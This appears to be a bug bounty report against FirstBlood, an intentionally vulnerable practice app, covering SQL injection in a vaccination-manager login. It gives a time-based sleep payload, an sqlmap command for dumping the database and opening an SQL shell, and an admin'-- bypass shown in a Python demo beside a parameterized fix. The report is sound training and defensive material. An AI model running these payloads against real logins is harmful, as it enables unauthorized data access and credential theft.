FirstBlood-#603 — SQL Injection on /vaccination-manager/login.php through password parameter
This issue was discovered on FirstBlood v2.0.0 (issues patched)
On 2021-10-26, holybugx reported:
SQL Injection is possible on the Vaccination Management Panel using the `password` parameter. Using this SQL Injection I was able to completely extract the database and gain access to the
Steps To Reproduce
- Open the Vaccination Management Panel and use `admin` as the username. Intercept the request to "Secure Login":
- Supply `admin' or sleep(10) and 1=1#` as the value of the password parameter and inspect the response time:
As observed, the SQL Injection vulnerability is valid. It's possible to further exploit this to extract the complete database.
One of the best tools to automate the exploitation of SQL Injection is SQLMap.
Copy the POST request to `/vaccination-manager/login.php` and save it inside a file (req.txt).
Use the following command to run SQLMap and extract all database details:
`sqlmap.py -r req.txt -p password --batch --random-agent -a`
It is also possible to get an interactive SQL shell using the `--sql-shell` flag of SQLMap:
After analyzing the output, I found the `admin` credentials used to log in to the Vaccination Management portal:
- SQL Injection leading to complete extraction of the database as well as interactive SQL shell
The only sure way to prevent SQL Injection attacks is input validation and parameterized queries including prepared statements. The application code should never use the input directly. The developer must sanitize all input, not only web form inputs such as login forms. In your case the login form was vulnerable, but to be sure, it's better to implement proper input validation on all user inputs.
You must remove potential malicious code elements such as single quotes. It is also a good idea to turn off the visibility of database errors on your production sites. Database errors can be used with SQL Injection to gain information about your database. There were no database errors in your case, but it's always good to keep that in mind.
Some functions like `mysqli_real_escape_string()` in PHP can also protect against them. But be careful to read the documentation when using those kinds of functions. For example, in PHP `addslashes()` may seem to be a good alternative but is cheap when it comes to SQL injection protection due to malicious charset tricks.
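The following is an added, offline stand-in for the two points above (the time-based check in the reproduction steps, and the parameterized-query fix in the remediation); it is not code from the report or from FirstBlood. It assumes the login page builds its query by string concatenation of the `username` and `password` fields, which the report does not show. SQLite replaces MySQL, so MySQL's `sleep()` is emulated with a user-defined function whose delay is capped (MySQL would block for the full 10 seconds the payload asks for), and the comment terminator `#` is replaced by SQLite's `--`. The users table, its rows and passwords are constructed for the demo.

```python
"""Offline stand-in for the vaccination-manager login SQL injection.

Assumptions (not from the report): the vulnerable page splices user input
straight into its SQL text, and the users table looks like the one below.
SQLite is used instead of MySQL, so MySQL's SLEEP() is emulated and the
report's `#` comment terminator becomes SQLite's `--`.
"""
import sqlite3
import time

# Cap the emulated sleep so the demo finishes quickly; a real MySQL backend
# would block for the full 10 seconds the report's payload requests.
SLEEP_CAP_SECONDS = 0.3


def _emulated_sleep(seconds):
    """Stand-in for MySQL SLEEP(): block (capped) and return 0 like MySQL."""
    time.sleep(min(float(seconds), SLEEP_CAP_SECONDS))
    return 0


def make_db():
    """In-memory users table with constructed sample rows (not real data)."""
    conn = sqlite3.connect(":memory:")
    conn.create_function("sleep", 1, _emulated_sleep)
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)"
    )
    conn.executemany(
        "INSERT INTO users (username, password) VALUES (?, ?)",
        [("admin", "S3cret-adm1n"), ("nurse1", "flu-shot-2021")],
    )
    return conn


def vulnerable_login(conn, username, password):
    """Assumed flawed pattern: input concatenated into the SQL string."""
    sql = (
        "SELECT id, username FROM users WHERE username='" + username
        + "' AND password='" + password + "'"
    )
    return conn.execute(sql).fetchone()


def safe_login(conn, username, password):
    """Parameterized query: the driver sends input as data, never as SQL."""
    sql = "SELECT id, username FROM users WHERE username=? AND password=?"
    return conn.execute(sql, (username, password)).fetchone()


def timed(login, conn, username, password):
    """Run one login attempt and return (row, elapsed_seconds)."""
    start = time.perf_counter()
    row = login(conn, username, password)
    return row, time.perf_counter() - start


def looks_time_based_injectable(conn, login, threshold=0.2):
    """The report's check: does the sleep() payload delay the response?

    The payload makes the WHERE clause `... OR sleep(10) AND 1=1`, which
    returns no row (sleep() yields 0) but stalls once per row evaluated.
    """
    _, baseline = timed(login, conn, "admin", "wrongpassword")
    _, delayed = timed(login, conn, "admin", "admin' or sleep(10) and 1=1-- ")
    return delayed - baseline >= threshold


if __name__ == "__main__":
    db = make_db()
    print("vulnerable, sleep payload delays:", looks_time_based_injectable(db, vulnerable_login))
    print("parameterized, sleep payload delays:", looks_time_based_injectable(db, safe_login))
    # Comment-based bypass: the password check is cut off entirely.
    print("vulnerable, admin'-- as username:", vulnerable_login(db, "admin'-- ", "x"))
    print("parameterized, admin'-- as username:", safe_login(db, "admin'-- ", "x"))
```

Note that the sleep payload alone never logs you in; it only proves the clause is evaluated, which is why the report then hands the request to SQLMap to pull the credentials out. The `admin'-- ` username shows the direct bypass variant against the same concatenated query, and the parameterized version treats both payloads as literal strings that match no row.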
FirstBlood ID: 30
Vulnerability Type: SQL Injection
There is an SQL injection on the vaccination management portal login page which results in the user being able to login as the administrator.